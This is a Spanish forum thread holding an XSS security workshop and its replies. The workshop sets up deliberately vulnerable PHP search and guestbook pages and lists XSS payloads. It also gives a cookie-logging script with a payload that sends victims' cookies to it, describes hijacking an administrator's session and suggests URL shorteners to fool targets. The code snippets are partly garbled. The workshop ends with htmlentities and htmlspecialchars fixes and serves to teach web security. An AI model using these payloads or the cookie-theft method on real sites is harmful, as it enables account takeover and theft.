Underc0de

Foros Generales => Talleres Underc0de => Mensaje iniciado por: ANTRAX en Septiembre 14, 2014, 05:13:14 PM

Título: Taller de Seguridad Web #1
Publicado por: ANTRAX en Septiembre 14, 2014, 05:13:14 PM
(https://lh4.googleusercontent.com/-Zin2RzDCx_k/VBXcLa3CRaI/AAAAAAAAB_Q/0x0IfSMrWoo/w388-h564-no/Seguridad%2BWeb%2B1.png)

1. Introducción.

La sigla XSS significa Cross Site Scripting, el motivo por el cual no se abrevia CSS, es para no confundirlo con las hojas de estilo.
El XSS es una vulnerabilidad muy popular hoy en día y según estadísticas de OWASP, el 90% de los sitios webs son vulnerables y el 70% de esas poseen XSS.

A pesar de que el XSS sea una vulnerabilidad antigua, hasta el día de hoy siguen apareciendo nuevos vectores para explotarla.
Esta vulnerabilidad de seguridad permite a un atacante insertar código HTML o Javascript a un formulario web con el fin de poder obtener información para luego sacarle provecho. Normalmente se utiliza para robar las Cookies del administrador de algún sitio y luego poder usarlas para loguearse con ella. Aunque también es utilizado para hacer Phishing, defaces, etc.

El XSS surge como consecuencia de errores de filtrado de las entradas de usuarios en los sitios web.

Esta vulnerabilidad se suele encontrar la mayoría de las veces en buscadores de páginas webs. Pero en realidad se puede hallar en cualquier sitio que contenga formularios, como lo son formularios de registros, libros de visitas, entre otros.

Los XSS se clasifican de dos formas:

Persistente:

Los XSS Persistentes o Stored, son aquellos que quedan guardados en el sitio vulnerable y puede afectar a cualquier persona que ingrese al website, ya que queda alojado en el sitio y cada persona que entre se verá afectada por el.
Este tipo de vulnerabilidad es muy difícil de encontrar y suele verse en libros de visitas, o algún tipo de formulario de carga. Con esto se podría llegar a hacer un deface colocando un div que ocupe toda la página o con alguna redirección hacia otro sitio.

Reflejado:

El XSS reflejado es aquel que no queda almacenado en la web vulnerable, pero nos puede servir si el XSS viaja por la URL. De esta forma podríamos por medio de la URL, ejecutarle el script a alguien.
Si bien es más difícil sacarle provecho, suele verse en una gran cantidad de sitios, en especial si son buscadores.


2. Taller Práctico | Explotando la Vulnerabilidad.

Reflejado:

En esta primera parte del taller montaremos una plataforma vulnerable a XSS reflejado. Para ello necesitaremos tener un host para montarlo o simplemente tener instalado XAMPP/WAMP en nuestra máquina.

Algo muy importante es que usen Firefox, ya que en otros navegadores, a veces no se muestran las alertas.

Lo que haremos ahora, será abrir un bloc de notas y pondremos el siguiente código:

index.html

Código (html5) [Seleccionar]
<html>
<head>
<title>Underc0de XSS Reflejado</title>
</head>
<body>
<center>
<img src="logo.png">
<form action="buscador.php" method="get">
Buscador: <input name="buscar" value="" size="50">
<br/>
<input type="submit" value="Buscar"/>
</form>
</center>
</body>
</html>


(https://lh5.googleusercontent.com/-WMI0HEL5AUY/VBXbjY071AI/AAAAAAAAB7k/Z_uDHQazWqM/w425-h351-no/1.png)

Una vez guardado, abriremos nuevamente el bloc de notas y pondremos lo siguiente:

buscador.php
Código (php) [Seleccionar]
<html>
<head>
<title>Resultado de la busqueda</title>
</head>
<body>
<center>
<img src="logo.png">
<?php
if(isset($_GET["buscar"]))
{
  $busqueda$_GET["buscar"];
echo "<p align='center'>No se ha encontrado ningun resultado que contenga:" $busqueda "</p>";
}
?>

</center>
</body>
</html>


(https://lh3.googleusercontent.com/-AU_fVdhA78E/VBXbmQJOzOI/AAAAAAAAB-E/ZzzmpVastrs/w663-h183-no/2.png)

Básicamente lo que hacen estos archivos, es:

El archivo index.html contiene un input en el cual se le ingresa la palabra a buscar. Al presionar sobre el botón buscar, envía esa palabra ingresada al archivo buscador.php y esta muestra esa palabra.

Una vez hecho y comprendido esto, los guardamos y colocamos a ambos ficheros dentro de un directorio dentro de la carpeta htdocs o www (dependiendo de si se usa wamp o xampp), en mi caso se llamara XSS.

Accedemos desde el navegador a nuestro directorio:

En mi caso, sería: http://localhost/xss

Deberíamos ver algo como esto:

(https://lh6.googleusercontent.com/-nmsco4KfdqY/VBXbpiwwgFI/AAAAAAAAB-A/GHrKMDEP5n8/w532-h160-no/3.png)

Para probar si funciona, colocaremos alguna palabra y presionaremos en el botón buscar:

El resultado será el siguiente:

(https://lh6.googleusercontent.com/-nq1A94wFbiQ/VBXbq-NBpjI/AAAAAAAAB-Q/oNTNp7rYjWg/w353-h31-no/4.png)

(https://lh3.googleusercontent.com/-I1ac5qCarrA/VBXbq7AREzI/AAAAAAAAB-Y/jdBBsQDUmpQ/w528-h164-no/5.png)

Como podemos ver, la palabra insertada en el input, es mostrada en este formulario y si miramos la url, podremos observar que dicha palabra también viaja por ahí:

http://localhost/xss/buscador.php?buscar=Underc0de

Como dijimos en un principio, esta vulnerabilidad permite inyectar código HTML en la aplicación web. Para ello colocaremos <h1>Underc0de</h1> y veremos qué es lo que pasa:

(https://lh5.googleusercontent.com/-KbPga6F0Hsg/VBXbrNORDvI/AAAAAAAAB-o/sQeSaeMqYxY/w426-h47-no/6.png)

(https://lh4.googleusercontent.com/-4lF563R2iVE/VBXbruxnyrI/AAAAAAAAB-k/TqYMWsWxjdo/w388-h166-no/7.png)

Con esto podríamos casi afirmar que esta web es vulnerable a XSS. Para terminar de despejarnos las dudas, insertaremos lo siguiente:

<script>alert('XSS');</script>

(https://lh6.googleusercontent.com/-NcuVgSHCdyo/VBXbrlL2yfI/AAAAAAAAB-s/a2FyQbMR2KY/w378-h43-no/8.png)

(https://lh6.googleusercontent.com/-NqMkaQEAyxg/VBXbsgVUc1I/AAAAAAAAB-4/Gsl9mYirSag/w402-h346-no/9.png)

Y aquí tenemos nuestro XSS reflejado.

Como podrán ver, en todas las capturas he puesto las URL, y en este caso tenemos:

http://localhost/xss/buscador.php?buscar=<script>alert('xss');</script>

La cual podemos pasar a alguien y así poder ejecutarle el script.

Algo que se suele hacer, es ocultar la URL con algún acortador de direcciones para pasar desapercibido.

Algunas aclaraciones a tener en cuenta:

Vector: <script>alert('XSS');</script>

El vector puede ir variando dependiendo de cómo esté hecho el formulario en donde se está inyectando.

En este caso es fácil, ya que el archivo busqueda.php muestra lo mismo que ingresamos en el index.html

Existen varias variantes para los vectores tales como:

"><script>alert('XSS');</script>
<script>alert(/XSS/);</script>


También podemos utilizar números, con los cuales no hace falta usar comillas ni barras

<script>alert(9);</script>
<script>alert(document.cookie);</script>
<imgsrc='javascript: alert(/XSS/); //.jpg' >


También se pueden filtrar los <> y la barra / utilizando caracteres hexadecimales:

%3Cscript%3ealert(/XSS/);%3C%2Fscript%3e

Otra de las cosas que se pueden hacer es un bucle:

<script>for(;;)alert("bucle");</script>

Entre muchísimos más que se pueden utilizar dependiendo el sitio web.

Persistente:

Como bien habíamos dicho antes, el XSS persistente es aquel que queda alojado en la vulnerable y puede afectar a todo aquel que lo visite.

A continuación haremos un estilo de libro de visitas el cual será vulnerable a XSS. Para ello, abrimos el bloc de notas, y colocamos el siguiente código:

Index.php

Código (html5) [Seleccionar]
<html>
<head>
<title>Libro de visitas</title>
</head>
<body>
<center>
<hr>
<h1>Libro de visitas</h1>
<hr>
<form action="enviar.php" method="POST">
<input name="nombre"type="text"value="Ingresa tu nombre">
<br><br>
<textarea name="comentario">Ingresa tu comentario</textarea>
<br><br>
<input name="enviar" type="submit" value="Enviar">
</form>
<hr>
<h1>Comentarios enviados</h1>
<hr>
<?phpreadfile('comentarios.txt'); ?>
</center>
</body>
</html>


(https://lh4.googleusercontent.com/-eqUH8TVqYis/VBXbjZBeekI/AAAAAAAAB_I/5ZLrIwxarE4/w584-h287-no/10.png)

Enviar.php

Código (php) [Seleccionar]
<?php
$nombre 
$_POST['nombre']; 
$comentario $_POST['comentario']; 
$fecha =date("j-n-Y h:i:s" ); 
$fp=fopen("comentarios.txt","a+" ); 
$salida='
<div>'
.$nombre.', publicado el '.$fecha.'</div>
<div>'
.$comentario.'</div>
<hr>'

fwrite($fp,$salida); 
fclose($fp); 
header("Location:index.php" );
?>


(https://lh4.googleusercontent.com/-nagoVMFzVbE/VBXbjogRhvI/AAAAAAAAB7o/PKp-ePHW6NA/w583-h147-no/11.png)

Finalmente, creamos un archivo vacío llamado comentarios.txt con permisos de escritura, ya que ahí se guardaran los comentarios de nuestro libro de visitas.

Al igual que al script anterior, lo colocamos en nuestro servidor e ingresamos desde el navegador.

Tendremos algo como esto:

(https://lh4.googleusercontent.com/-_aBVU97UcMQ/VBXbkMBhtsI/AAAAAAAAB74/kh70KwKqccA/w571-h339-no/12.png)

Colocamos nuestro nombre en el campo para ingresar nombre, y en el comentario colocamos el siguiente vector:

<script>alert(/XSS/)</script>

(https://lh5.googleusercontent.com/-88ZEdCvjR8Y/VBXbkRxHe-I/AAAAAAAAB8M/cIfZkVFsK98/w483-h429-no/13.png)

Al dar en el botón enviar, nuestro vector se almacenará en el libro de visitas y cada vez que alguien ingrese al sitio, se ejecutara el script.

(https://lh4.googleusercontent.com/-c2APxy-6YYA/VBXbknYEzvI/AAAAAAAAB8I/hQJOSa7BFmM/w446-h373-no/14.png)


3. Robo de Cookies | Uso de estas.

Según Wikipedia,
Una cookie (o galleta informática) es una pequeña información enviada por un sitio web y almacenada en el navegador del usuario, de manera que el sitio web puede consultar la actividad previa del usuario.

Y una de sus principales funciones es:

Llevar el control de usuarios: cuando un usuario introduce su nombre de usuario y contraseña, se almacena una cookie para que no tenga que estar introduciéndolas para cada página del servidor.

En este taller aprenderemos a sacar las cookies de alguna persona que entre al libro de visitas, y si esa persona es el administrador, sus cookies se podrían utilizar para poder hacernos pasar por él, y entrar al panel de administración del sitio web.

Para ello, crearemos el siguiente archivo en php

cookies.php

Código (php) [Seleccionar]
<?
$cookie = $_GET['cookie'];
$fff=fopen("cookies.txt","a");
fwrite($fff, "$cookie\n");
fclose($fff);
?>


(https://lh4.googleusercontent.com/-NRVUmOLEcJI/VBXbk6AExeI/AAAAAAAAB8E/VddGCdWLYmI/w398-h99-no/15.png)

Además, en el mismo path en el que estará el archivo cookies.php, debemos crear uno llamado cookies.txt vacio con permisos de escritura.

Ahora nos dirigimos a la página vulnerable y utilizaremos el siguiente vector para capturar las cookies de las personas que ingresen:

<script>window.location='http://localhost/xss/cookies.php?cookie='+document.cookie;</script>

Reemplazar http://localhost/xss/cookies.php por la dirección a donde tenemos alojado el script.

Antes de crear el mensaje con la inyección, debemos recordar, que si lo introducimos, siempre que iniciemos al libro de visitas, nos redirigirá al archivo cookie.php por lo que, después de que el administrador haya entrado al sitio, deberemos de editar el mensaje, para eso, vamos a fijarnos en las urls.

(https://lh4.googleusercontent.com/-EBF4VSM1qW4/VBXblCGQEFI/AAAAAAAAB-w/8h7raO1RzYk/w417-h43-no/16.png)

(https://lh6.googleusercontent.com/-hwsGLq8bWhI/VBXblgiU7hI/AAAAAAAAB8k/3tx9Pw3dnfU/w471-h250-no/17.png)

Una vez creado, vamos a editar nuestro propio mensaje, copiando la url para después poder volver a editarlo sin entrar al index.

(https://lh3.googleusercontent.com/-B9SsPS4Vf-k/VBXblv5ZNQI/AAAAAAAAB8g/MZloaaxKT1E/w570-h38-no/18.png)

(https://lh3.googleusercontent.com/-Qc7cmrMR2Pw/VBXbl-OrIlI/AAAAAAAAB8c/-fI157Px1_I/w541-h329-no/19.png)

Y ahora sí, lo editamos por nuestra inyección.

(https://lh3.googleusercontent.com/-Db9P5YXV27I/VBXbmkRXnzI/AAAAAAAAB80/cDKqTx7Gm2U/w545-h263-no/20.png)

Editamos el mensaje y observamos que nos ha redirigido a nuestro propio archivo.

(https://lh4.googleusercontent.com/-3dSpTwFLNeM/VBXbm1UsgwI/AAAAAAAAB88/Ia1ZPZL3ro8/w571-h45-no/21.png)

Descartando esa cookie,ya que es la nuestra, esperaremos a que el administrador acceda al sitio.

Minutos después, comprobamos el fichero cookies.txt y observamos esto:

(https://lh4.googleusercontent.com/-aIumrRX3Knw/VBXbnVnRdPI/AAAAAAAAB9E/dM-F5xeNUOE/w332-h72-no/22.png)

Sabiendo que la primera es nuestra cookie, vamos  a probar con la segunda, esperando a que sea la de un administrador.

Volvemos a nuestra url, para editar el mensaje que habíamos creado, pudiendo así acceder de nuevo al index.

(https://lh6.googleusercontent.com/-OwCkiBxqWys/VBXbn0RtALI/AAAAAAAAB9I/mU3n3Ysehw4/w504-h255-no/23.png)

Ahora, para utilizar la cookie que hemos robado, podemos usar varias extensiones, entre ellas, live http headers, tamper data, y cookie manager +, etc...

Buscamos nuestra cookie y la editamos por la que hemos conseguido:

(https://lh3.googleusercontent.com/-nITxaKm5Mro/VBXboNkgSTI/AAAAAAAAB9Y/uEX4SlBF_WQ/w492-h403-no/24.png)

Dejándola así:

(https://lh4.googleusercontent.com/-EcZ_f4mDzT8/VBXboRR82eI/AAAAAAAAB9k/OtCcixWtRvs/w490-h397-no/25.png)

Guardamos los cambios y refrescamos el libro de visitas.

Y bingo! Tenemos acceso a la administración.

(https://lh3.googleusercontent.com/-V14uuNx7rQI/VBXboktd0qI/AAAAAAAAB9c/cqft8d8FaHo/w318-h207-no/26.png)

En caso de que tengamos un XSS reflejado en algún sitio, deberemos armar toda la URL con el vector para robar la cookie, y pasarle esa url a la persona que deseemos, que por lo general suele ser a los admines de las páginas. Pero por lo general, esas urls armadas suelen ser muy evidentes, por lo que se utilizan acortadores de urls para que no sospechen.


4. Arreglando la Vulnerabilidad.

Existen varias formas de solucionar la vulnerabilidad, las más usadas es por medio de:

Conhtmlentities() todos los caracteres que tienen equivalente HTML son convertidos  y de esta forma no deja ni abrir ni cerrar etiquetas HTML. Para aplicarlo al formulario del libro de visitas, simplemente debemos modificar las líneas en donde se pasan las variables $nombre y $comentario, dejándolos de la siguiente forma:
Código (html5) [Seleccionar]

<div>'.htmlentities($nombre).', publicado el '.$fecha.'</div>
<div>'.htmlentities($comentario).'</div>


Una vez modificado, los scripts ya no se ejecutaran en el navegador y nos mostrara correctamente el texto ingresado.

(https://lh5.googleusercontent.com/-nAzNbFKRf3E/VBXbo6-jUyI/AAAAAAAAB94/tKmFyDLoEas/w421-h416-no/27.png)

De la misma manera,  solucionaremos la vulnerabilidad en el archivo buscador.php

(https://lh5.googleusercontent.com/-eaEpjaT8A18/VBXbpWkGqiI/AAAAAAAAB90/UXwwwLawNPo/w615-h23-no/28.png)

(https://lh6.googleusercontent.com/-5WzXSC1txLM/VBXbpVaNjdI/AAAAAAAAB98/CUhNLDul0n8/w482-h133-no/29.png)

La otra forma es con htmlspecialchars(), la cual convierte caracteres especiales en entidades HTML y realiza las siguientes conversiones:

•   '"' (comillas dobles) se convierte en '&quot;' cuando ENT_NOQUOTESno está establecido.
•   "'" (comilla simple) se convierte en ''' (o &apos;) sólo cuando ENT_QUOTESestá establecido.
•   '<' (menor que) se convierte en '&lt;'
•   '>' (mayor que) se convierte en '&gt;'
•   '&' (et) se convierte en '&amp;'

Suponiendo que se tiene el siguiente código vulnerable:

Código (php) [Seleccionar]
<?php
$pag 
$_GET['page'];
if(
$pag=="index"){
echo"index";
}
elseif(
$pag!= ""){
echo
"Error: ".$pag." No existe.";
}
?>


Se aplica de la siguiente forma:

Código (php) [Seleccionar]
<?php
$pag 
$_GET['page'];
if(
$pag=="index"){
echo"index";
}
elseif(
$pag!= ""){
$pagg=htmlspecialchars($pagENT_QUOTES);
echo
"Error: ".$pagg." No existe.";
}
?>


Ambas son similares htmlspecialchars() convierte caracteres que se usan para trabajar con HTML (<, >, ", ' y &), htmlentities() traduce todos aquellos que tengan un equivalente a HTML además de los mencionados antes (Por Ejemplo: vocales acentuadas).

Tutores: Blackdrake - ANTRAX

Descargar en formato PDF (http://underc0de.org/talleres/Taller_Seguridad_Web_1.pdf)
Título: Re:Taller de Seguridad Web #1
Publicado por: Expermicid en Septiembre 14, 2014, 06:30:48 PM
Genial!!!!

Ahora me guardo el pdf con los otros. Espero ver los demas mas adelante.

Saludos
Título: Re:Taller de Seguridad Web #1
Publicado por: Flemon en Septiembre 14, 2014, 06:49:24 PM
Muy bueno, Esta perfectamente detallado... Muchas Gracias bro, son muy buenos Talleres los que se hacen en Underc0de..
Título: Re:Taller de Seguridad Web #1
Publicado por: blackdrake en Septiembre 14, 2014, 08:15:38 PM
Si alguien tiene alguna pregunta/duda/sugerencia, que lo escriba sin dudarlo.

Un saludo y gracias a todos por sus comentarios ^^
Título: Re:Taller de Seguridad Web #1
Publicado por: n4pst3r en Septiembre 16, 2014, 12:10:16 AM
blackdrake & ANTRAX, que buen taller va directo a la coleccion, Gracias

Saludos
Título: Re:Taller de Seguridad Web #1
Publicado por: Stuxnet en Septiembre 16, 2014, 10:45:29 PM
Muy Bueno.

Espero para la próxima entrega algo sobre xss worm y DOM XSS.

Saludos.
Título: Re:Taller de Seguridad Web #1
Publicado por: Snifer en Septiembre 16, 2014, 11:53:15 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Muy Bueno.

Espero para la próxima entrega algo sobre xss worm y DOM XSS.

Saludos.

Hey bro porque tu armas una entrega explicando esos puntos?

Regards,
Snifer
Título: Re:Taller de Seguridad Web #1
Publicado por: 8-Matrix-8 en Septiembre 17, 2014, 12:40:08 AM
Muy bueno! No creí que habria tantos sites gubernamentales con la vulnerabilidad xss reflejado.

Gracias por el taller!
Título: Re:Taller de Seguridad Web #1
Publicado por: deeps_vee en Febrero 07, 2015, 11:34:47 PM
Una pregunta como puedo hacer para que me funcione el codigo de la primera parte que esta en php ya que me salta un errror. Copie el codigo igualito lo revise mil veces cambie algunas partes que me parecieron que podrian probocar el problema pero ni idea.Si alguno tuvo el mismo problema que me diga como lo suluciono porfavor
Chau nos leemos
Título: Re:Taller de Seguridad Web #1
Publicado por: rollth en Febrero 07, 2015, 11:47:50 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Una pregunta como puedo hacer para que me funcione el codigo de la primera parte que esta en php ya que me salta un errror. Copie el codigo igualito lo revise mil veces cambie algunas partes que me parecieron que podrian probocar el problema pero ni idea.Si alguno tuvo el mismo problema que me diga como lo suluciono porfavor
Chau nos leemos

Te puedes descargar la web directamente...
http://underc0de.es
Título: Re:Taller de Seguridad Web #1
Publicado por: willymtx en Febrero 17, 2015, 11:32:15 AM
Muy bueno el taller... lo pondre en practica. Gracias  8)
Título: Re:Taller de Seguridad Web #1
Publicado por: D3ivid en Febrero 17, 2015, 03:11:59 PM
genial tuto y haciendo las practicas en xampp :)
Título: Re:Taller de Seguridad Web #1
Publicado por: deeps_vee en Marzo 04, 2015, 10:29:57 PM
Me quedo una duda en esto capas te salteaste una letra o no entendi algo porque pones cuando va > ecribis %3 y no pones %3e porque buscando por internet encontré que se usa para ese símbolo eso %3e

Es en esta parte donde aparece eso
Citar
También se pueden filtrar los <> y la barra / utilizando caracteres hexadecimales:

%3Cscript%3alert(/XSS/);%3C%2Fscript%3
Saludos y gracias por el taller
Título: Re:Taller de Seguridad Web #1
Publicado por: blozzter en Marzo 05, 2015, 12:12:09 PM
Excelente material. Gracias.
Título: Re:Taller de Seguridad Web #1
Publicado por: blackdrake en Marzo 05, 2015, 02:20:46 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Me quedo una duda en esto capas te salteaste una letra o no entendi algo porque pones cuando va > ecribis %3 y no pones %3e porque buscando por internet encontré que se usa para ese símbolo eso %3e

Es en esta parte donde aparece eso
Citar
También se pueden filtrar los <> y la barra / utilizando caracteres hexadecimales:

%3Cscript%3alert(/XSS/);%3C%2Fscript%3
Saludos y gracias por el taller

En efecto es %3E, lamentamos el error, ahora mismo lo modifico.

Un saludo.
Título: Re:Taller de Seguridad Web #1
Publicado por: MagoAstral en Marzo 05, 2015, 04:42:38 PM
Muy bueno, respecto al tema de utilizar Firefox, no necesariamente debes utilizar Firefox. Como sabéis Chrome tiene el XSS Auditor cuya función es detectar posibles ataques, etc...
Si queremos realizar una prueba de concepto podemos abrirlo con el flag:

--disable-web-security

Lo cual nos permitirá la libre ejecución de código JS, inyecciones XSS entre otros, para los que no sepan arrancar la flag la sintaxis sería algo así:

"ruta de google chrome ejecutable" --args --disable-web-security

Por lo demás chapó! ;)
Un saludo!
Título: Re:Taller de Seguridad Web #1
Publicado por: D3ivid en Marzo 05, 2015, 07:30:15 PM
Muchas gracias por lo que a mi me toca MagoAstral desconocia le XSSauditor de chrome ya lo tengo activado xD
Título: Re:Taller de Seguridad Web #1
Publicado por: baron.power en Marzo 08, 2015, 04:46:31 PM
Muchas gracias. me servira de gran utilidad, saludos
Título: Re:Taller de Seguridad Web #1
Publicado por: Payasako en Marzo 31, 2015, 08:24:30 PM
Hay un error en la programación de buscador.php

CitarParse error: syntax error, unexpected 'align' (T_STRING) in /home/u387232811/public_html/buscador.php on line 12

En la línea 12:
Citarecho'<p align="center">No se ha encontrado
Título: Re:Taller de Seguridad Web #1
Publicado por: ANTRAX en Marzo 31, 2015, 08:34:09 PM
Muchas gracias por notificarlo...
Proba poniendole vos las comillas. Cuando lo escribí en Word, puede que haya tomado las comillas de ahí y son diferentes.

Saludos!
ANTRAX
Título: Re:Taller de Seguridad Web #1
Publicado por: neoxalber en Junio 14, 2015, 08:26:03 PM
una duda por que al inyectar el codigo para robar cookies no me aprecen las cookies solo esto url/hacking/undercode/xss/visitas/cookies.php?cookie=(aqui no aparece nada)  espero y me puedan ayudar de antemano gracias  ;D
Título: Re:Taller de Seguridad Web #1
Publicado por: ANTRAX en Junio 14, 2015, 09:07:03 PM
@neoxalber (https://underc0de.org/foro/index.php?action=profile;u=38048) podrías dar un poco mas de detalles? no alcancé a entenderte bien

Saludos!
ANTRAX
Título: Re:Taller de Seguridad Web #1
Publicado por: neoxalber en Junio 14, 2015, 09:26:26 PM
bueno lo que pasa es que al momento de hacer pruebas de robo de cookies e inyectar  el codigo que dejaron (<script>window.location='http://localhost/xss/cookies.php?cookie='+document.cookie;</script>) claro con la url mia donde esta alojado el .php solo queda asi  url/hacking/undercode/xss/visitas/cookies.php?cookie= en donde deberia arrojar las cookies solo esta en blanco(vi que debe de aparecer algo parecido a esto PHPSESSID=) ese espacio queda en blanco, las pruebas las hice con el index.php y el enviar.php que dejadon las subi tanto a mi servidor local y a un hosting pero solo se queda asi , crei que era la vercion de navegador y lo probe en el movil y quedo igual , disculpa por no tener un lenguaje amplio  en este tema , soy algo nuevo gracias :)
Título: Re:Taller de Seguridad Web #1
Publicado por: ANTRAX en Junio 14, 2015, 09:58:52 PM
Proba poniendo esto asi:

<script>alert(document.cookie)</script>

Eso debería mostrarte la cookie en un alert y ahi te fijas si verdaderamente aparece algo en blanco
Título: Re:Taller de Seguridad Web #1
Publicado por: bernatixer en Enero 02, 2016, 09:24:34 AM
Muy bien escrito y fácil de entender, gracias por el aporte!
Título: Re:Taller de Seguridad Web #1
Publicado por: inigomad en Febrero 29, 2016, 07:06:53 AM
Buenas. Tengo una duda con el taller, que por cierto me parece que está genial. Para robar la cookie se usa la página vulnerable message.php que es bastante más compleja que la que se propone para crear comentarios (index.php). ¿Está el código de esa página message.php accesible en algún lugar? Supongo que habrá una gestión de usuarios y creación de la cookie a robar.

Gracias y muy buen trabajo!
Título: Re:Taller de Seguridad Web #1
Publicado por: blackdrake en Febrero 29, 2016, 07:53:24 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Buenas. Tengo una duda con el taller, que por cierto me parece que está genial. Para robar la cookie se usa la página vulnerable message.php que es bastante más compleja que la que se propone para crear comentarios (index.php). ¿Está el código de esa página message.php accesible en algún lugar? Supongo que habrá una gestión de usuarios y creación de la cookie a robar.

Gracias y muy buen trabajo!

La página message.php no es vulnerable, la que es vulnerable (ya que no filtra el XSS), es el index.php (la que muestra los mensajes).

La web que se utiliza es el típico libro de visitas.

Saludos.
Título: Re:Taller de Seguridad Web #1
Publicado por: inigomad en Febrero 29, 2016, 08:33:29 AM
Pero entonces no hay cookie que secuestrar. Index.php no genera ninguna cookie, ni se administra usuarios, al usar cookie.php meterá un valor en blanco.
Título: Re:Taller de Seguridad Web #1
Publicado por: blackdrake en Marzo 01, 2016, 06:24:17 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Pero entonces no hay cookie que secuestrar. Index.php no genera ninguna cookie, ni se administra usuarios, al usar cookie.php meterá un valor en blanco.

Existe la cookie de la sesión.

Saludos.
Título: Re:Taller de Seguridad Web #1
Publicado por: Voodoo2k en Febrero 13, 2017, 11:44:20 PM
A ver. Estoy intentando capturar la Cookie del administrador.... ya tengo subido los dos archivos: cookie.php y cookies.txt , para eso creé un directorio en la raíz del host llamada XSS para hacer exactamente lo mismo que se hace en el tutorial ... ahora pongo el script exactamente así: <script>window.location='https://dominio/xss/cookies.php?cookie='+document.cookie;</script> ... pero no me captura nada ... cual podría ser mi error?. Veo que efectivamente cuando inyecto el script me redirige al archivo cookie.php en el host. Pero al ver el archivo cookies.txt no hay nada.
Título: Re:Taller de Seguridad Web #1
Publicado por: Riojas en Febrero 14, 2017, 06:53:06 PM
Tengo el mismo problema.
Estoy trabajando en un servidor gratuito y al poner el <script>alert(document.cookie);</script> me aparece en blanco.
Pero al ponerlo en una pagina vulnerable que encontré si me muestra la información.
Ayuda porfavor!!
Título: Re:Taller de Seguridad Web #1
Publicado por: The Smiley Man en Febrero 14, 2017, 06:59:26 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Tengo el mismo problema.
Estoy trabajando en un servidor gratuito y al poner el <script>alert(document.cookie);</script> me aparece en blanco.
Pero al ponerlo en una pagina vulnerable que encontré si me muestra la información.
Ayuda porfavor!!

Eso me paso al principio pero repase el codigo y re-escribi los "" ' etc. asi se me soluciono.
Título: Re:Taller de Seguridad Web #1
Publicado por: rollth en Febrero 14, 2017, 07:32:26 PM
He visto que varias personas tenía problemas con el código del buscador.php
Lo he modificado y ahora sí debería de funcionar.

Saludos.
Título: Re:Taller de Seguridad Web #1
Publicado por: gabe56 en Febrero 14, 2017, 07:59:24 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
A ver. Estoy intentando capturar la Cookie del administrador.... ya tengo subido los dos archivos: cookie.php y cookies.txt , para eso creé un directorio en la raíz del host llamada XSS para hacer exactamente lo mismo que se hace en el tutorial ... ahora pongo el script exactamente así: <script>window.location='https://dominio/xss/cookies.php?cookie='+document.cookie;</script> ... pero no me captura nada ... cual podría ser mi error?. Veo que efectivamente cuando inyecto el script me redirige al archivo cookie.php en el host. Pero al ver el archivo cookies.txt no hay nada.

Hola chicos, tengo el mismo problema que Voodo2k. ¿Cual sería la solución a esto?. Gracias, un abrazo.
Título: Re:Taller de Seguridad Web #1
Publicado por: Güez en Febrero 14, 2017, 09:52:36 PM
Hay un error en el codigo de "buscador.php"
En la linea 9 y 12, las comillas dobles del "buscar" deben reemplazarse por unas comillas simples '.
De manera que quede asi :
<html>
        <head>
                <title>Resultado de la busqueda</title>
        </head>
        <body>
<center>
                        <img src="logo.png">
                        <?php
                        
if(isset($_GET['buscar']))
                {
                  
$busqueda$_GET['buscar'];
                echo 
"<p align='center'>No se ha encontrado ningun resultado que contenga:" $busqueda "</p>";       
                }
                
?>

                </center>       
</body>
</html>

Título: Re:Taller de Seguridad Web #1
Publicado por: broxxsm en Febrero 15, 2017, 04:42:59 PM
Buenas, gran taller amigo me acabo de enterar por el grupo ya que no me di cuenta de los talleres, aun que en la primera parte del tuto me aparecio un error de php en el buscador.php en la linea 9 exactamente, yo lo solucione cambiando las dos comillas que tenia a una solo y me dejo seguir por si alguien le paso. saludos!
Título: Re:Taller de Seguridad Web #1
Publicado por: jfcasillasl en Agosto 20, 2018, 10:26:45 AM
Me ha gustado mucho y es ideal para mi como docente este tutorial,espero y pronto hagan una continuación de este taller, saludos
Título: Re:Taller de Seguridad Web #1
Publicado por: Lucashe en Mayo 22, 2023, 02:14:13 AM
muchas gracias  por el aporte!
Título: Re:Taller de Seguridad Web #1
Publicado por: apscecilia en Mayo 26, 2023, 06:56:15 PM
Que buenola práctica. Excelente material
Título: Re:Taller de Seguridad Web #1
Publicado por: QualcomGatuno en Mayo 26, 2023, 07:23:16 PM
muy didáctico!! me encantó, saludos